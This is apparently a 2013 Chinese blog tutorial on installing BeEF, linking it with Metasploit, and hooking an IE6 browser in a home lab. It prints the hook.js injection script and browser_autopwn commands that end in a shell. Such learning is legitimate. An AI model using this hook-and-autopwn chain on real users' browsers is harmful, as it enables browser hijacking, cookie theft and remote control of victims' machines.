初探BeEF

原创 2013年12月04日 09:55:43

前几天刚刚做完了XSS的一个测试关卡

听蓝蓝大神说有个XSS神器叫Beef

他还写了个win下的搭建使用教程

那我就写个BT5r3下的教程

仅供自己翻阅方便,版权意识基本没有

=============================================================================

1.什么是BeEF?


就是 The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。

里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。

大概长这个样子(默认用户名密码是beef,beef):



2.安装beef和使用beef


BT5r3 已经是自带了ruby和beef了,我们不用下载和安装了。

ruby :ruby 1.9.2dev (2010-07-02) [i486-linux]
beef :Version 0.4.3.6-alpha

beef默认安装在:/pentest/web/beef/ 下

metasploit默认安装在:/opt/metasploit/下

翻看了下beef的安装文档:INSTALL.txt

 1. Prerequisites (platform independent)
 
      BeEF requires ruby 1.9 and the "bundler" gem. Bundler can be installed by:
 
      gem install bundler
 
3. Prerequisites (Linux)
 
      !!! This must be done PRIOR to running the bundle install command !!!
      
      On linux you will need to find the packages specific to your distribution for sqlite.  An example for Ubuntu systems is:
 
      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
      3.2. rvm install 1.9.2
      3.3. rvm use 1.9.2
发现有个东西必须的安装: bundler!(千古一问:为什么BT5不一起把bundler安装好呢?)

总结了下就是:

apt-get install libsqlite3-dev sqlite3 sqlite3-doc 
gem install bundler
bundle install
如果出错(因为环境变量的问题,我感觉看官们一定会出错的,乖乖输入下面的命令):

gem install --user-install bundler 
然后开启beef:./beef

出现如下信息则成功:

root@bt:/pentest/web/beef# ./beef 
[ 9:17:50][*] Browser Exploitation Framework (BeEF)
[ 9:17:50]    |   Version 0.4.3.6-alpha
[ 9:17:50]    |   Website http://beefproject.com
[ 9:17:50]    |   Run 'beef -h' for basic help.
[ 9:17:50]    |_  Run 'git pull' to update to the latest revision.
[ 9:17:50][*] Successful connection with Metasploit.
[ 9:17:53][*] Loaded 203 Metasploit exploits.
[ 9:17:53][*] BeEF is loading. Wait a few seconds...
[ 9:17:57][*] 9 extensions loaded:
[ 9:17:57]    |   Console
[ 9:17:57]    |   Requester
[ 9:17:57]    |   Events
[ 9:17:57]    |   Proxy
[ 9:17:57]    |   XSSRays
[ 9:17:57]    |   Autoloader
[ 9:17:57]    |   Metasploit
[ 9:17:57]    |   Demos
[ 9:17:57]    |_  Admin UI
[ 9:17:57][*] 316 modules enabled.
[ 9:17:57][*] 2 network interfaces were detected.
[ 9:17:57][+] running on network interface: 127.0.0.1
[ 9:17:57]    |   Hook URL: http://127.0.0.1:3000/hook.js
[ 9:17:57]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[ 9:17:57][+] running on network interface: 192.168.198.128
[ 9:17:57]    |   Hook URL: http://192.168.198.128:3000/hook.js
[ 9:17:57]    |_  UI URL:   http://192.168.198.128:3000/ui/panel
[ 9:17:57][*] RESTful API key: c29aef201f68aee70afc6ffedea1f77e8304ce72
[ 9:17:57][*] HTTP Proxy: http://127.0.0.1:6789
[ 9:17:57][*] BeEF server started (press control+c to stop)

其实BeEF能干很多事,比如说,控制被HOOK浏览器弹个框吧:



3.配置beef携手Metasploit


首先关闭beef(Ctrl+C)。

在/opt/metasploit/文件夹下gedit beef.rc,写入内容:

load msgrpc ServerHost=127.0.0.1 Pass=abc123
这里上网搜了下,发现密码神马的最好不要改,那就不改啦~

安装msgpack:

 gem install --user-install msgpack
修改配置让beef支持metasploit:

gedit /pentest/web/beef/config.yaml
把        metasploit:
           enable: false
改成:
           metasploit:
           enable: true

Ps:这里必须先开msf,再开beef,才能在beef下用msf,也就是说两者开着一起工作!

我们启动metasploit:

root@bt:/opt/metasploit/msf3# msfconsole -r beef.rc 

出现如下信息就表示成功:

[*] Processing beef.rc for ERB directives.
resource (beef.rc)> load msgrpc ServerHost=127.0.0.1 Pass=abc123
[*] MSGRPC Service:  127.0.0.1:55552 
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc

然后我们再启动beef:

root@bt:/pentest/web/beef# ./beef 


beef,beef登陆后我们就能看到一个可爱的界面了:



然后BeEF自带了一个hack页面,坐等别人上钩:

http://127.0.0.1:3000/demos/basic.html 

里面主要是有这么一段js代码:

	<script>
		var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '/hook.js" type="text/javascript"><\/script>';
		document.write(commandModuleStr);
	</script>
只要有人访问了这个站点,就会上钩,然后加入到beef左侧。。


4.对XPSP1测试


(1)让xp sp1 用IE6访问hack页面:

http://192.168.198.128:3000/demos/basic.html 

发现面板左侧上多了一个目标,也就是我们喜欢的IE6:



(2)

拿msf生成HOOK链接:

msf > use auxiliary/server/browser_autopwn 
msf  auxiliary(browser_autopwn) > set LHOST 192.168.198.128 #我服务器自己的地址
LHOST => 192.168.198.128
msf  auxiliary(browser_autopwn) > run
然后出来一大堆URL,我们选择,IE的一个:

http://192.168.198.128:8080/hxRmMPkYJa
控制被HOOK的浏览器去访问这个链接:



然后msf 突然就开始自己(意味着自动化,这点以前一直以为我要做些什么,其实不用)跑起来,拿到shell:



至此,BeEF就算是一个初步认识和使用了。

有很多功能还没学会了,不过我感觉控制那个cookie之类的应该是没问题了。。

这么强大的神器,你还在等什么呢?



emaster  关注信息安全的胖子

欢迎转载,但转载请注明地址:http://blog.csdn.net/emaste_r/article/details/17091067

版权声明:随意转载。

使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell

利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.11...
  • MickeyMouse1928
  • MickeyMouse1928
  • 2017年04月08日 14:13
  • 2959

【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架

存储型XSS                                                               长期存储于服务器端                   ...
  • edu_aqniu
  • edu_aqniu
  • 2017年09月30日 15:30
  • 807

BeEF

一、BeEF简介   BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。可在其官网找到更详细的介绍http://beefproject.com/。   二、安装BeEF ...
  • mydriverc2
  • mydriverc2
  • 2014年12月16日 16:55
  • 705

Metasploit+beef攻击实验

  • 2017年10月12日 16:26
  • 403KB
  • 下载

kali beef-xss结合metasploit配置

安装kali linux之后 第一步:切换更新源进行系统软件更新,编辑系统源文件:vi /etc/apt/sources.list 把官方源进行注释,并且加上国内更新源,因为国内的更快,我...
  • u013526533
  • u013526533
  • 2016年09月06日 14:53
  • 1486

xss利用之kali神器beef

1、beef基本配置 BeEF在Kali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config....
  • jiangliuzheng
  • jiangliuzheng
  • 2016年07月14日 16:48
  • 9992

初探BeEF

完了XSS的一个测试关卡 听蓝蓝大神说有个XSS神器叫Beef 他还写了个win下的搭建使用教程 那我就写个BT5r3下的教程 仅供自己翻阅方便,版权意识基本没有 ===...
  • izj007
  • izj007
  • 2017年05月30日 23:33
  • 161

ubuntu下安装beef

BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentes...
  • qk1992919
  • qk1992919
  • 2016年10月26日 16:46
  • 326

教你玩BeEF

Kali-linux之渗透突破 BeEF:是比较著名的一个xss利用框架,它是交互界面友好,高度集成,开源的一个项目!和国外其他渗透测试项目一样,它也可以和其他很多工具结合使用,如MSF.   ...
  • hard_lushunming
  • hard_lushunming
  • 2015年09月29日 00:53
  • 1528

内网渗透一:利用Xss漏洞进入内网

0x01:科普 Beef目前欧美最流行的WEB框架攻击平台,全称:The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞,通过一段编写好的...
  • xysoul
  • xysoul
  • 2015年05月02日 14:59
  • 2732
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:初探BeEF
举报原因:
原因补充:

(最多只允许输入30个字)